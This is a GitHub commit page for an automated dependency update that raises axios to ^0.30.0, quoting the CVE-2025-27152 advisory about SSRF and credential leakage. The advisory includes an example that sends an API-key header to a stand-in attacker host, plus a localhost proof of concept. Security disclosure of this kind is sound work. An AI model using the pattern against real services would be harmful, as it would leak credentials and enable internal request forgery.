-
Notifications
You must be signed in to change notification settings - Fork 11
Commit f925738
![renovate[bot]](https://avatars.githubusercontent.com/in/2740?v=4&size=40){kind=avatar}
![kodiakhq[bot]](https://avatars.githubusercontent.com/in/29196?v=4&size=40){kind=avatar}
fix(deps): update dependency axios to ^0.30.0 [security] (#932)
This PR contains the following updates:
| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [axios](https://axios-http.com)
([source](https://redirect.github.com/axios/axios)) | [`^0.29.0` ->
`^0.30.0`](https://renovatebot.com/diffs/npm/axios/0.29.0/0.30.0) |
[](https://docs.renovatebot.com/merge-confidence/)
|
[](https://docs.renovatebot.com/merge-confidence/)
|
[](https://docs.renovatebot.com/merge-confidence/)
|
[](https://docs.renovatebot.com/merge-confidence/)
|
### GitHub Vulnerability Alerts
####
[CVE-2025-27152](https://redirect.github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6)
### Summary
A previously reported issue in axios demonstrated that using
protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: axios/axios#6463
A similar problem that occurs when passing absolute URLs rather than
protocol-relative URLs to axios has been identified. Even if `baseURL`
is set, axios sends the request to the specified absolute URL,
potentially causing SSRF and credential leakage. This issue impacts both
server-side and client-side usage of axios.
### Details
Consider the following code snippet:
```js
import axios from "axios";
const internalAPIClient = axios.create({
baseURL: "http://example.test/api/v1/users/",
headers: {
"X-API-KEY": "1234567890",
},
});
// const userId = "123";
const userId = "http://attacker.test/";
await internalAPIClient.get(userId); // SSRF
```
In this example, the request is sent to `http://attacker.test/` instead
of the `baseURL`. As a result, the domain owner of `attacker.test` would
receive the `X-API-KEY` included in the request headers.
It is recommended that:
- When `baseURL` is set, passing an absolute URL such as
`http://attacker.test/` to `get()` should not ignore `baseURL`.
- Before sending the HTTP request (after combining the `baseURL` with
the user-provided parameter), axios should verify that the resulting URL
still begins with the expected `baseURL`.
### PoC
Follow the steps below to reproduce the issue:
1. Set up two simple HTTP servers:
```
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
```
2. Create a script (e.g., main.js):
```js
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
```
3. Run the script:
```
$ node main.js
this is server2
```
Even though `baseURL` is set to `http://localhost:10001/`, axios sends
the request to `http://localhost:10002/`.
### Impact
- Credential Leakage: Sensitive API keys or credentials (configured in
axios) may be exposed to unintended third-party hosts if an absolute URL
is passed.
- SSRF (Server-Side Request Forgery): Attackers can send requests to
other internal hosts on the network where the axios program is running.
- Affected Users: Software that uses `baseURL` and does not validate
path parameters is affected by this issue.
---
### Release Notes
<details>
<summary>axios/axios (axios)</summary>
###
[`v0.30.0`](https://redirect.github.com/axios/axios/releases/tag/v0.30.0)
[Compare
Source](https://redirect.github.com/axios/axios/compare/v0.29.0...v0.30.0)
#### Release notes:
##### Bug Fixes
- fix: modify log while request is aborted by
[@​mori5321](https://redirect.github.com/mori5321) in
[https://github.com/axios/axios/pull/4917](https://redirect.github.com/axios/axios/pull/4917)
- fix: update CHANGELOG.md for v0.x by
[@​TehZarathustra](https://redirect.github.com/TehZarathustra) in
[https://github.com/axios/axios/pull/6271](https://redirect.github.com/axios/axios/pull/6271)
- fix: modify upgrade guide for 0.28.1's breaking change by
[@​nafeger](https://redirect.github.com/nafeger) in
[https://github.com/axios/axios/pull/6787](https://redirect.github.com/axios/axios/pull/6787)
- fix: backport allowAbsoluteUrls vulnerability fix to v0.x by
[@​thatguyinabeanie](https://redirect.github.com/thatguyinabeanie)
in
[https://github.com/axios/axios/pull/6829](https://redirect.github.com/axios/axios/pull/6829)
- fix: add allowAbsoluteUrls type by
[@​thatguyinabeanie](https://redirect.github.com/thatguyinabeanie)
in
[https://github.com/axios/axios/pull/6849](https://redirect.github.com/axios/axios/pull/6849)
##### Contributors to this release
- [@​mori5321](https://redirect.github.com/mori5321) made their
first contribution in
[https://github.com/axios/axios/pull/4917](https://redirect.github.com/axios/axios/pull/4917)
- [@​TehZarathustra](https://redirect.github.com/TehZarathustra)
made their first contribution in
[https://github.com/axios/axios/pull/6271](https://redirect.github.com/axios/axios/pull/6271)
- [@​nafeger](https://redirect.github.com/nafeger) made their
first contribution in
[https://github.com/axios/axios/pull/6787](https://redirect.github.com/axios/axios/pull/6787)
-
[@​thatguyinabeanie](https://redirect.github.com/thatguyinabeanie)
made their first contribution in
[https://github.com/axios/axios/pull/6829](https://redirect.github.com/axios/axios/pull/6829)
**Full Changelog**:
axios/axios@v0.29.0...v0.30.0
</details>
---
### Configuration
📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).
🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.
🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/erezrokah/aws-testing-library).
<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MC40MC4zIiwidXBkYXRlZEluVmVyIjoiNDAuNDAuMyIsInRhcmdldEJyYW5jaCI6Im1haW4iLCJsYWJlbHMiOlsicmVub3ZhdGUiXX0=-->
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: kodiakhq[bot] <49736102+kodiakhq[bot]@users.noreply.github.com>1 parent 7c6bc64 commit f925738Copy full SHA for f925738
File tree
Expand file treeCollapse file tree
2 files changed
+8
-8
lines changedOpen diff view settings
Filter options
Expand file treeCollapse file tree
2 files changed
+8
-8
lines changedOpen diff view settings
Collapse file
+7-7Lines changed: 7 additions & 7 deletions
Some generated files are not rendered by default. Learn more about customizing how changed files appear on GitHub.
Collapse file
+1-1Lines changed: 1 addition & 1 deletion
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
| |||
64 | 64 | | |
65 | 65 | | |
66 | 66 | | |
67 | | - | |
| 67 | + | |
68 | 68 | | |
69 | 69 | | |
70 | 70 | | |
| |||
0 commit comments